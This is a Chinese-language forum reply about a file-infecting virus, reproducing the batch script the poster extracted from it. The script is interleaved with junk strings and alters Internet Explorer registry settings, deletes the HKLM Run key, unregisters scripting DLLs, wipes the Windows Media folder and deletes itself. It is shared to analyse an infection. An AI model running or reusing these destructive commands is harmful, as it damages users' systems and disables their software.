回复: 病毒感染应用程序不会清理,,
分裂者【感染型】Sql全是82KB但MD5不同猜测是将某字节到某字节的内容复制出来然后将病毒代码写进去



以下代码
udkgdoraeudkgdorae
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Display Inline Images" /t REG_SZ /d yes /F
efqyegcbsxcurzulqbfon
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Play_Animations /t REG_SZ /d no /F
hzdjxznvednayetshydmzmw
reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /F
rcicyrxwunmanocvvyfidzsob
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v DisableScriptDebuggerIE /t REG_SZ /d yes /F
bwouykiqiveroeffwpmsnvksivqk
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Play_Background_Sounds /t REG_SZ /d no /F
eytfzctswdkfiwpmapumso
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Display Inline Videos" /t REG_SZ /d no /F
osgxandlrmojbhwjgudgcvro
regsvr32.exe /u /s itss.dll
zulqbfonmflqrudif
regsvr32.exe /u /s scrrun.dll
boribyzgtcytrpmsotiv
lrwtcqsihkrfqzonynclkfaifdptan
regsvr32.exe /u /s msvidctl.dll
wljmviccvsshomjbknrkzvih
regsvr32.exe /s jscript.dll
gfpevbndrabpcxypwgbpstowte
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Disable Script Debugger" /t REG_SZ /d yes /F
jhupwtyxfchjglsmfutsr
del C:\WINDOWS\Media\*.* /Q
tbhhxmiytqlhzrkiijrkeyo
regsvr32.exe /u /s vbscript.dll
ednayetshydmzmwealsfiwxf
regsvr32.exe /u /s vbscript.dll
gyskyxeuvgjjmccztd
del %0
del %0
qaxdzppnrpnemgfsnmzqyqqmvsnod
exit








